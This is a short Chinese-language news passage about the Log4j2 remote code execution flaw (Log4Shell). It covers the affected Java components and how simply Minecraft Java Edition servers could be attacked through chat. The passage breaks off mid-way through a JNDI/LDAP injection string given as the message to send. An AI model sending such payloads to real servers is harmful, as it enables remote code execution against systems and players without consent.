12月9日晚,根据安全卫士服务号披露,开源项目ApacheLog4j2存在的一个远程代码执行漏洞,其中细节被公开,很多黑客伺机开始攻击各种商业项目。
log4j
由于log4j是java生态中非常非常基础的一个日志库,可以说是到“水电煤”级别的库。JAVA的很多组件都会依赖、使用这个库进行日志写入。
目前ApacheSolr、ApacheStruts2、ApacheDruid、ApacheFlink等众多组件及大型应用均已经受到了影响,需尽快采取方案阻止。
我的世界JAVA版攻击
特别是我的世界JAVA版本中,攻击方法超级简单,在游戏的在线聊天中,发送一条带漏洞触发指令的消息,类似“${jndi:ldap://{}.